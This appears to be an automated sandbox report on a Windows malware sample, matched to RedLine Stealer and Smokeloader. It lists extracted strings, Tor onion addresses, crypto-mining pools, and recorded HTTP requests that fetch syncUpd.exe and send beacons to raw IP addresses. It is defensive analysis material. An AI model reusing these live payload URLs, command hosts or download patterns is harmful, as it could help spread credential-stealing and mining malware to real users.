inconsistencyinvalid Trailer key %qinvalid address familyinvalid number base %djson: unknown field %qkernel32.dll not foundmalformed HTTP versionminpc or maxpc invalidmissing ']' in addressmultiple :: in addressndndword5lpb7eex.onionnetwork is unreachableno connection providednon-Go function at pc=oldoverflow is not niloperation was canceledoverflowing coordinateozahtqwp25chjdjd.onionprotocol not availableprotocol not supportedqtornadoklbgdyww.onionread response body: %wreflect.Value.MapIndexreflect.Value.SetFloatreflectlite.Value.Elemreflectlite.Value.Typeremote address changedruntime.main not on m0runtime: work.nwait = runtime:scanstack: gp=s.freeindex > s.nelemss7clinmo4cazmhul.onionscanstack - bad statussecure boot is enabledsend on closed channelserver.peers.subscribeservice does not existservice is not runningset Tor mode to %s: %wskipping Question Nameskipping Question Typespan has no free spacesql: no Rows availablestack not a power of 2status/bootstrap-phasetrace reader (blocked)trace: alloc too largetransaction is stoppedtransaction not existsunexpected length codeunexpected method stepwirep: invalid p statewrite on closed bufferx509: malformed issuerzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2
                        Source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1486193490.000000000C1B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: 0b1c1115494a5c52100110515d52141b57170d14161d12025206141340084056005707170746501e16121203571c1452160c10121450010500175112041a055b0c0b0a070bhttps://statsexplorer.orghttp://3ebu257qh2dlauxqj7cgv3i55e4orb55mwgqf4tq7eicsa3dfhr4aaid.onion.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
                        Source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000400000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: Nyiakeng_Puachue_HmongPakistan Standard TimeParaguay Standard TimeRoGetActivationFactoryRtlDeleteFunctionTableRtlGetNtVersionNumbersSafeArrayGetRecordInfoSafeArraySetRecordInfoSakhalin Standard TimeSao Tome Standard TimeSeImpersonatePrivilegeSetupDiEnumDriverInfoWSetupDiGetClassDevsExWTasmania Standard TimeTor bootstrap progressTor service is runningUnsupported Media TypeWSAGetOverlappedResultWSALookupServiceBeginWWaitForMultipleObjectsWget/1.12 (freebsd8.1)Xenu Link Sleuth/1.3.8access-control-max-ageaddress already in useadvapi32.dll not foundargument list too longassembly checks failedbad g->status in readybad sweepgen in refillbitcoin3nqy3db7c.onionbody closed by handlercannot allocate memoryclient not initializedcompileCallabck: type couldn't create devicecouldn't get file infocouldn't start servicecoulnd't write to filecreate main window: %wdecode and decrypt: %wdriver: bad connectionduplicated defer entryelectrum.leblancnet.uselectrum3.hodlister.coelectrum5.hodlister.coelectrumxhqdsmlu.onionencrypt and encode: %werror decoding messageerror parsing regexp: failed to get UUID: %wfailed to hide app: %wfailed to open key: %wfailed to open src: %wfailed to register: %wfailed to set UUID: %wframe_data_pad_too_bigfreeIndex is not validgenerate challenge: %wgetenv before env initgzip: invalid checksumheadTailIndex overflowheader field %q = %q%shide process ID %d: %whpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://localhost:3433/https://duniadekho.baridna: invalid label %qinappropriate fallbackinteger divide by zerointegrity check failedinterface conversion: internal inconsistencyinvalid Trailer key %qinvalid address familyinvalid number base %djson: unknown field %qkernel32.dll not foundmalformed HTTP versionminpc or maxpc 
invalidmissing ']' in addressmultiple :: in addressndndword5lpb7eex.onionnetwork is unreachableno connection providednon-Go function at pc=oldoverflow is not niloperation was canceledoverflowing coordinateozahtqwp25chjdjd.onionprotocol not availableprotocol not supportedqtornadoklbgdyww.onionread response body: %wreflect.Value.MapIndexreflect.Value.SetFloatreflectlite.Value.Elemreflectlite.Value.Typeremote address changedruntime.main not on m0runtime: work.nwait = runtime:scanstack: gp=s.freeindex > s.nelemss7clinmo4cazmhul.onionscanstack - bad statussecure boot is enabledsend on closed channelserver.peers.subscribeservice does not existservice is not runningset Tor mode to %s: %wskipping Question Nameskipping Question Typespan has no free spacesql: no Rows availablestack not a power of 2status/bootstrap-phasetrace reader (blocked)trace: alloc too largetransaction is stoppedtransaction not existsunexpected length codeunexpected method stepwirep: invalid p statewrite on closed bufferx509: malformed issuerzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2
                        Source: 288c47bbc1871b439df19ff4df68f076.exeString found in binary or memory: s25519: internal error: setShortBytes called with a long stringhttp2: Transport closing idle conn %p (forSingleUse=%v, maxStream=%v)http://vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.oniontls: handshake message of length %d bytes exceeds maximum o
                        Source: 288c47bbc1871b439df19ff4df68f076.exeString found in binary or memory: nvalid checksumheadTailIndex overflowheader field %q = %q%shide process ID %d: %whpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://localhost:3433/https://duniadekho.baridna: invalid label %qinappropriate fallbackint
                        Source: 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1593892332.000000000C0A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: PS C:\Users\user\AppData\Local\Temp> C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeC:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exehttp://3ebu257qh2dlauxqj7cgv3i55e4orb55mwgqf4tq7eicsa3dfhr4aaid.onionC:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\WindowsAppsC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.comC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.exeC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.batC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.cmdC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.vbsC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.vbeC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.jsC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.jseC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.wsfC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.wshC:\Program Files (x86)\Common Fi
                        Source: global traffic | TCP traffic: 192.168.2.9:49707 -> 51.195.138.197:14433
                        Source: global traffic | TCP traffic: 192.168.2.9:49709 -> 51.15.58.224:14433
                        Source: Joe Sandbox View | IP Address: 185.172.128.90
                        Source: Joe Sandbox View | IP Address: 104.20.3.235
                        Source: Joe Sandbox View | IP Address: 51.15.58.224
                        Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
                        Source: unknown | TCP traffic detected without corresponding DNS query: 185.172.128.90
                        Source: unknown | TCP traffic detected without corresponding DNS query: 185.172.128.127
                        Source: unknown | TCP traffic detected without corresponding DNS query: 185.172.128.109
                        Source: unknown | TCP traffic detected without corresponding DNS query: 5.42.64.33
                        Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: global traffic | HTTP traffic detected:
                            GET /raw/2HQ8Rbid HTTP/1.1
                            Accept: */*
                            Connection: close
                            Host: pastebin.com
                            User-Agent: cpp-httplib/0.12.6
                        Source: global traffic | HTTP traffic detected:
                            GET /cpa/ping.php?substr=four&s=ab HTTP/1.1
                            User-Agent: NSIS_Inetc (Mozilla)
                            Host: 185.172.128.90
                            Connection: Keep-Alive
                            Cache-Control: no-cache
                        Source: global traffic | HTTP traffic detected:
                            GET /syncUpd.exe HTTP/1.1
                            User-Agent: NSIS_Inetc (Mozilla)
                            Host: 185.172.128.127
                            Connection: Keep-Alive
                            Cache-Control: no-cache
                        Source: global traffic | HTTP traffic detected:
                            GET /syncUpd.exe HTTP/1.1
                            User-Agent: NSIS_Inetc (Mozilla)
                            Host: 185.172.128.109
                            Connection: Keep-Alive
                            Cache-Control: no-cache
                        Source: global traffic | HTTP traffic detected:
                            GET /ping.php?substr=four HTTP/1.1
                            User-Agent: NSIS_Inetc (Mozilla)
                            Host: 5.42.64.33
                            Connection: Keep-Alive
                            Cache-Control: no-cache
                        Source: 288c47bbc1871b439df19ff4df68f076.exe | String found in binary or memory: OS X; U; en) Presto/2.6.30 Version/10.61facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)tls: internal error: handshake returned an error but is marked successfultls: received unexpected handshake message of type %T when waiting for %T equals www.facebook.com (Facebook)
                        Source: 288c47bbc1871b439df19ff4df68f076.exe | String found in binary or memory: o Debian/1.6-7Mozilla/5.0 (compatible; Konqueror/3.3; Linux 2.6.8-gentoo-r3; X11;facebookscraper/1.0( http://www.facebook.com/sharescraper_help.php)2695994666715063979466701508701962594045780771442439172168272236806126959946667150639794667015087019630673557916 equals www.facebook.com (Facebook)
                        Source: global traffic | DNS traffic detected: DNS query: xmr-eu2.nanopool.org
                        Source: global traffic | DNS traffic detected: DNS query: pastebin.com
                        Source: global traffic | DNS traffic detected: DNS query: xmr-eu1.nanopool.org
                        Source: InstallSetup4.exe, 00000003.00000003.2241896798.000000000067B000.00000004.00000020.00020000.00000000.sdmp, InstallSetup4.exe, 00000003.00000002.2242373966.000000000067B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.172.128.109/en-GB
                        Source: InstallSetup4.exe, 00000003.00000002.2242373966.00000000006B3000.00000004.00000020.00020000.00000000.sdmp, InstallSetup4.exe, 00000003.00000003.2241896798.000000000067B000.00000004.00000020.00020000.00000000.sdmp, InstallSetup4.exe, 00000003.00000003.2241896798.00000000006B3000.00000004.00000020.00020000.00000000.sdmp, InstallSetup4.exe, 00000003.00000002.2242373966.000000000067B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.172.128.109/syncUpd.exe
                        Source: InstallSetup4.exe, 00000003.00000002.2242373966.00000000006B3000.00000004.00000020.00020000.00000000.sdmp, InstallSetup4.exe, 00000003.00000003.2241896798.00000000006B3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.172.128.109/syncUpd.exe_
                        Source: InstallSetup4.exe, 00000003.00000002.2242373966.0000000000648000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.172.128.109/syncUpd.exehttp://5.42.64.33/ping.php?substr=fourSOFTWARE
                        Source: InstallSetup4.exe, 00000003.00000003.2241896798.000000000067B000.00000004.00000020.00020000.00000000.sdmp, InstallSetup4.exe, 00000003.00000002.2242373966.000000000067B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.172.128.127/
                        Source: InstallSetup4.exe, 00000003.00000003.2241896798.000000000067B000.00000004.00000020.00020000.00000000.sdmp, InstallSetup4.exe, 00000003.00000002.2242373966.000000000067B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.172.128.127/i
                        Source: InstallSetup4.exe, 00000003.00000003.2241896798.000000000067B000.00000004.00000020.00020000.00000000.sdmp, InstallSetup4.exe, 00000003.00000002.2242373966.000000000067B000.00000004.00000020.00020000.00000000.sdmp, InstallSetup4.exe, 00000003.00000002.2242373966.0000000000648000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.172.128.127/syncUpd.exe
                        Source: InstallSetup4.exe, 00000003.00000002.2242373966.000000000067B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.172.128.90/cpa/ping.php?substr=four&s=ab
                        Source: InstallSetup4.exe, 00000003.00000002.2242373966.0000000000648000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.172.128.90/cpa/ping.php?substr=four&s=ab/SILENT/TOSTACK/NOCANCELget
                        Source: InstallSetup4.exe, 00000003.00000003.2241896798.000000000067B000.00000004.00000020.00020000.00000000.sdmp, InstallSetup4.exe, 00000003.00000002.2242373966.000000000067B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.172.128.90/cpa/ping.php?substr=four&s=abG
                        Source: InstallSetup4.exe, 00000003.00000003.2241896798.000000000067B000.00000004.00000020.00020000.00000000.sdmp, InstallSetup4.exe, 00000003.00000002.2242373966.000000000067B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.172.128.90/cpa/ping.php?substr=four&s=abt
                        Source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1486193490.000000000C194000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1486193490.000000000C1E0000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1486193490.000000000C184000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://3ebu257qh2dlauxqj7cgv3i55e4orb55mwgqf4tq7eicsa3dfhr4aaid.onion
                        Source: 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1593892332.000000000C0A0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://3ebu257qh2dlauxqj7cgv3i55e4orb55mwgqf4tq7eicsa3dfhr4aaid.onionC:
                        Source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1486193490.000000000C194000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://3ebu257qh2dlauxqj7cgv3i55e4orb55mwgqf4tq7eicsa3dfhr4aaid.onionhttp://3ebu257qh2dlauxqj7cgv3i5
                        Source: InstallSetup4.exe, 00000003.00000002.2242373966.00000000006B3000.00000004.00000020.00020000.00000000.sdmp, InstallSetup4.exe, 00000003.00000003.2241896798.00000000006B3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://5.42.64.33/G
                        Source: InstallSetup4.exe, 00000003.00000003.2241896798.000000000067B000.00000004.00000020.00020000.00000000.sdmp, InstallSetup4.exe, 00000003.00000002.2242373966.000000000067B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://5.42.64.33/ing.php?substr=fourh
                        Source: InstallSetup4.exe, 00000003.00000002.2242373966.00000000006B3000.00000004.00000020.00020000.00000000.sdmp, InstallSetup4.exe, 00000003.00000003.2241896798.000000000067B000.00000004.00000020.00020000.00000000.sdmp, InstallSetup4.exe, 00000003.00000003.2241896798.00000000006B3000.00000004.00000020.00020000.00000000.sdmp, InstallSetup4.exe, 00000003.00000002.2242373966.000000000067B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://5.42.64.33/ping.php?substr=four
                        Source: 288c47bbc1871b439df19ff4df68f076.exe | String found in binary or memory: http://archive.org/details/archive.org_bot)Mozilla/5.0
                        Source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1479923842.0000000002830000.00000040.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.g
                        Source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1480915326.00000000031B3000.00000040.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000003.1401092787.0000000003AA2000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000843000.00000040.00000001.01000000.00000006.sdmp, vueqjgslwynd.exe, 0000001B.00000003.1474933632.000001EBD15A0000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
                        Source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1480915326.00000000031B3000.00000040.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000003.1401092787.0000000003AA2000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000843000.00000040.00000001.01000000.00000006.sdmp, vueqjgslwynd.exe, 0000001B.00000003.1474933632.000001EBD15A0000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/Root.crl0
                        Source: vueqjgslwynd.exe, 0000001B.00000003.1474933632.000001EBD15A0000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0
                        Source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1480915326.00000000031B3000.00000040.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000003.1401092787.0000000003AA2000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000843000.00000040.00000001.01000000.00000006.sdmp, vueqjgslwynd.exe, 0000001B.00000003.1474933632.000001EBD15A0000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/primobject.crl0
                        Source: 288c47bbc1871b439df19ff4df68f076.exe | String found in binary or memory: http://devlog.gregarius.net/docs/ua)Links
                        Source: 288c47bbc1871b439df19ff4df68f076.exe | String found in binary or memory: http://grub.org)Mozilla/5.0
                        Source: 288c47bbc1871b439df19ff4df68f076.exe | String found in binary or memory: http://help.yahoo.com/help/us/ysearch/slurp)SonyEricssonK550i/R1JD
                        Source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000003.1401092787.0000000003D2B000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1480915326.000000000343C000.00000040.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1587040107.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1591528645.000000000346C000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: http://https://_bad_pdb_file.pdb
                        Source: 288c47bbc1871b439df19ff4df68f076.exe | String found in binary or memory: http://invalidlog.txtlookup
                        Source: 288c47bbc1871b439df19ff4df68f076.exe | String found in binary or memory: http://localhost:3433/https://duniadekho.baridna:
                        Source: 288c47bbc1871b439df19ff4df68f076.exe | String found in binary or memory: http://misc.yahoo.com.cn/help.html)QueryPerformanceFrequency
                        Source: InstallSetup4.exe, 00000003.00000000.1359934275.000000000040A000.00000008.00000001.01000000.00000007.sdmp, InstallSetup4.exe, 00000003.00000002.2242153815.000000000040A000.00000004.00000001.01000000.00000007.sdmp | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
                        Source: 288c47bbc1871b439df19ff4df68f076.exe | String found in binary or memory: http://search.msn.com/msnbot.htm)msnbot/1.1
                        Source: 288c47bbc1871b439df19ff4df68f076.exe | String found in binary or memory: http://search.msn.com/msnbot.htm)net/http:
                        Source: 288c47bbc1871b439df19ff4df68f076.exe | String found in binary or memory: http://search.msn.com/msnbot.htm)pkcs7:
                        Source: 288c47bbc1871b439df19ff4df68f076.exe | String found in binary or memory: http://vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.oniontls:
                        Source: 288c47bbc1871b439df19ff4df68f076.exe | String found in binary or memory: http://www.alexa.com/help/webmasters;
                        Source: 288c47bbc1871b439df19ff4df68f076.exe | String found in binary or memory: http://www.alltheweb.com/help/webmaster/crawler)Mozilla/5.0
                        Source: 288c47bbc1871b439df19ff4df68f076.exe | String found in binary or memory: http://www.archive.org/details/archive.org_bot)Opera/9.80
                        Source: 288c47bbc1871b439df19ff4df68f076.exe | String found in binary or memory: http://www.avantbrowser.com)MOT-V9mm/
                        Source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1480915326.0000000002D70000.00000040.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000003.1401092787.0000000003660000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000400000.00000040.00000001.01000000.00000006.sdmp | String found in binary or memory: http://www.avantbrowser.com)MOT-V9mm/00.62
                        Source: 288c47bbc1871b439df19ff4df68f076.exe | String found in binary or memory: http://www.baidu.com/search/spider.htm)MobileSafari/600.1.4
                        Source: 288c47bbc1871b439df19ff4df68f076.exe | String found in binary or memory: http://www.bloglines.com)Frame
                        Source: BroomSetup.exe, 00000005.00000000.1369842650.000000000041C000.00000020.00000001.01000000.00000009.sdmp | String found in binary or memory: http://www.broomcleaner.com/buyOpen
                        Source: 288c47bbc1871b439df19ff4df68f076.exe | String found in binary or memory: http://www.everyfeed.com)explicit
                        Source: 288c47bbc1871b439df19ff4df68f076.exe | String found in binary or memory: http://www.exabot.com/go/robot)Opera/9.80
                        Source: 288c47bbc1871b439df19ff4df68f076.exe | String found in binary or memory: http://www.google.c
                        Source: 288c47bbc1871b439df19ff4df68f076.exe | String found in binary or memory: http://www.google.com/bot.html)Mozilla/5.0
                        Source: 288c47bbc1871b439df19ff4df68f076.exe | String found in binary or memory: http://www.google.com/bot.html)crypto/ecdh:
                        Source: 288c47bbc1871b439df19ff4df68f076.exe | String found in binary or memory: http://www.google.com/feedfetcher.html)HKLM
                        Source: 288c47bbc1871b439df19ff4df68f076.exe | String found in binary or memory: http://www.googlebot.com/bot.html)Links
                        Source: 288c47bbc1871b439df19ff4df68f076.exe | String found in binary or memory: http://www.spidersoft.com)
                        Source: 288c47bbc1871b439df19ff4df68f076.exe | String found in binary or memory: http://yandex.com/bots)Opera
                        Source: 288c47bbc1871b439df19ff4df68f076.exe | String found in binary or memory: http://yandex.com/bots)Opera/9.51
                        Source: 288c47bbc1871b439df19ff4df68f076.exe | String found in binary or memory: https://blockchain.infoindex
                        Source: 288c47bbc1871b439df19ff4df68f076.exe | String found in binary or memory: https://blockstream.info/apiinva
                        Source: 288c47bbc1871b439df19ff4df68f076.exe | String found in binary or memory: https://cdn.discordapp.com/attachments/1088058556286251082/1111230812579450950/TsgVtmYNoFT.zipMozill
                        Source: 288c47bbc1871b439df19ff4df68f076.exe | String found in binary or memory: https://github.com/Snawoot/opera-proxy/releases/download/v1.2.2/opera-proxy.windows-386.exeBlackBerr
                        Source: 288c47bbc1871b439df19ff4df68f076.exe | String found in binary or memory: https://raw.githubusercontent.com/spesmilo/electrum/master/electrum/servers.jsonsize
                        Source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1486193490.000000000C18A000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1486193490.000000000C1E0000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1486193490.000000000C184000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://statsexplorer.org
                        Source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1486193490.000000000C18A000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://statsexplorer.orgServers
                        Source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1486193490.000000000C1E4000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://statsexplorer.orghttp://3ebu257qh2dlauxqj7cgv3i55e4orb55mwgqf4tq7eicsa3dfhr4aaid.onion
                        Source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1486193490.000000000C1B0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://statsexplorer.orghttp://3ebu257qh2dlauxqj7cgv3i55e4orb55mwgqf4tq7eicsa3dfhr4aaid.onion.COM;.
                        Source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1486193490.000000000C1E0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://statsexplorer.orghttp://3ebu257qh2dlauxqj7cgv3i55e4orb55mwgqf4tq7eicsa3dfhr4aaid.onionSELECT
                        Source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1486193490.000000000C184000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://statsexplorer.orghttp://3ebu257qh2dlauxqj7cgv3i55e4orb55mwgqf4tq7eicsa3dfhr4aaid.onionWbemSc
                        Source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1486193490.000000000C18A000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://statsexplorer.orghttps://statsexplorer.org
                        Source: 288c47bbc1871b439df19ff4df68f076.exe | String found in binary or memory: https://turnitin.com/robot/crawlerinfo.html)cannot
                        Source: unknown | Network traffic detected: HTTP traffic on port 49708 -> 443
                        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49708
                        Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exe | Code function: 3_2_0040571B GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard

                        E-Banking Fraud

                        Source: Yara match | File source: 32.2.288c47bbc1871b439df19ff4df68f076.exe.400000.7.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 32.2.288c47bbc1871b439df19ff4df68f076.exe.2da0e67.12.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 2.2.288c47bbc1871b439df19ff4df68f076.exe.2d70e67.11.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 2.2.288c47bbc1871b439df19ff4df68f076.exe.400000.5.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 2.3.288c47bbc1871b439df19ff4df68f076.exe.3660000.7.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 32.3.288c47bbc1871b439df19ff4df68f076.exe.3690000.5.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 00000002.00000002.1480915326.00000000031B3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000002.00000003.1401092787.0000000003AA2000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000020.00000002.1591528645.00000000031E3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000020.00000002.1587040107.0000000000843000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000002.00000002.1471270614.0000000000843000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000020.00000003.1494671167.0000000003AD2000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: Process Memory Space: 288c47bbc1871b439df19ff4df68f076.exe PID: 7692, type: MEMORYSTR

                        System Summary

                        Source: 25C1.exe, type: SAMPLEMatched rule: Detects downloader / injector Author: ditekSHen
                        Source: 0.0.25C1.exe.520000.0.unpack, type: UNPACKEDPE | Matched rule: Detects downloader / injector Author: ditekSHen
                        Source: 00000020.00000002.1591101509.000000000299E000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                        Source: 00000020.00000002.1591528645.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                        Source: 00000002.00000002.1480915326.0000000002D70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                        Source: 00000002.00000002.1479923842.0000000002830000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                        Source: C:\Users\user\AppData\Local\Temp\FourthX.exe | Code function: 4_2_00007FF69A531394 NtAlpcOpenSenderThread
                        Source: C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exe | Code function: 27_2_00007FF7EE4A1394 NtSetDefaultUILanguage
                        Source: C:\Windows\System32\conhost.exe | Code function: 37_2_0000000140001394 NtCloseObjectAuditAlarm
                        Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exe | Code function: 3_2_00403532 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,ExitProcess,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
                        Source: C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exe | File created: C:\Windows\TEMP\gbfbijmbpkdw.sys
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File deleted: C:\Windows\Temp\__PSScriptPolicyTest_rta0son3.13e.ps1
